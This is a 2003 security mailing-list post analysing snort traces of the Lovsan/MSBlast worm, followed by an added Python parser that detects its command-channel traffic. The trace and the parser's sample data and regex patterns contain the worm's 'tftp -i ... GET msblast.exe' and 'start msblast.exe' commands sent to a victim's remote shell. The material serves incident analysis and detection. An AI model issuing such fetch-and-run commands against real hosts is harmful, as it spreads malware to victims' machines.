Lovsan packet traces (was: Re: [Dshield] infocon: yellow)

John Sage jsage at finchhaven.com
Tue Aug 12 15:31:48 GMT 2003


On Tue, Aug 12, 2003 at 12:31:56AM -0400, David Kennedy CISSP wrote:
> At 04:37 PM 8/11/03 -0700, John Sage wrote:
> 
> >T 2003/08/11 16:21:32.084084 12.82.154.207:2416 -> 12.82.140.147:4444 [AP]
> >  74 66 74 70 20 2d 69 20    31 32 2e 38 32 2e 31 35    tftp -i 12.82.15
> >  34 2e 32 30 37 20 47 45    54 20 6d 73 62 6c 61 73    4.207 GET msblas
> >  74 2e 65 78 65 0a                                     t.exe.          
> >#
> >T 2003/08/11 16:21:32.334124 12.82.154.207:2416 -> 12.82.140.147:4444 [A]
> >#
> >T 2003/08/11 16:21:53.146276 12.82.154.207:2416 -> 12.82.140.147:4444 [AP]
> >  73 74 61 72 74 20 6d 73    62 6c 61 73 74 2e 65 78    start msblast.ex
> >  65 0a                                                 e.              
> >exit
> 
> 
> Hmmm...has anyone else got a trace to look at?  The various analyses say
> that the victim fetches the executable from the attacker via TFTP (which
> uses UDP), and some say the worm installs a TFTP server on the attacker to
> serve up the executable.  But that's not in this trace.  This looks like
> command channel traffic to do the GET but it appears to me to be
> attacker:ephemeral vis-a-vis victim:4444.  Where's the port 69 UDP traffic?
>  *Is* there port 69 UDP traffic?

I wouldn't expect to see UDP:69 traffic in my setup because what I've
got is not an infected host, but rather a network data-sink sort of
thing that just accepts any packets sent to it and discards them, all
the while snort is logging the packet contents...


- John
-- 
"Obviously, we do not want to leave zombies around."
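Added example, not part of the post or the list: a small Python parser for the snort hex-dump format quoted above. It rebuilds each packet's payload from the hex columns (not the ASCII column) and flags the two command-channel strings the trace shows being sent to the victim's TCP/4444, so the same check can be run over other captures in this layout. It assumes the column layout seen above, with hex groups and the ASCII column separated by runs of three or more spaces.

```python
import re
# Sample input: the snort hex-dump trace quoted in the post, reproduced verbatim.
TRACE = """\
T 2003/08/11 16:21:32.084084 12.82.154.207:2416 -> 12.82.140.147:4444 [AP]
  74 66 74 70 20 2d 69 20    31 32 2e 38 32 2e 31 35    tftp -i 12.82.15
  34 2e 32 30 37 20 47 45    54 20 6d 73 62 6c 61 73    4.207 GET msblas
  74 2e 65 78 65 0a                                     t.exe.
#
T 2003/08/11 16:21:32.334124 12.82.154.207:2416 -> 12.82.140.147:4444 [A]
#
T 2003/08/11 16:21:53.146276 12.82.154.207:2416 -> 12.82.140.147:4444 [AP]
  73 74 61 72 74 20 6d 73    62 6c 61 73 74 2e 65 78    start msblast.ex
  65 0a                                                 e.
"""

HEADER = re.compile(r"^T (\S+ \S+) \S+:\d+ -> (\S+):(\d+) \[\w+\]")
# The two commands the worm types into the shell it opened on the victim's TCP/4444.
COMMANDS = [("tftp GET", re.compile(r"tftp\s+-i\s+(\S+)\s+GET\s+(\S+)", re.I)),
            ("start", re.compile(r"\bstart\s+(\S+)", re.I))]

def parse_trace(text):
    """Rebuild each packet as (ts, dst, dport, payload) from the hex columns; ASCII column ignored."""
    packets = []
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            ts, dst, dport = m.groups()
            packets.append([ts, dst, int(dport), bytearray()])
        elif packets and line.startswith("  "):
            # Columns are separated by runs of 3+ spaces; stop at the first non-hex column.
            for group in re.split(r"\s{3,}", line.strip()):
                toks = group.split()
                if not all(re.fullmatch(r"[0-9a-f]{2}", t) for t in toks):
                    break
                packets[-1][3].extend(int(t, 16) for t in toks)
    return [tuple(p) for p in packets]

def find_command_channel(text):
    """Flag the fetch and start commands sent to port 4444; returns one dict per command."""
    hits = []
    for ts, dst, dport, payload in parse_trace(text):
        if dport != 4444:
            continue
        cmd = payload.decode("latin-1")
        for action, pattern in COMMANDS:
            for m in pattern.finditer(cmd):
                hits.append({"ts": ts, "victim": dst, "action": action,
                             "server": m.group(1) if action == "tftp GET" else None,
                             "file": m.groups()[-1]})
    return hits
```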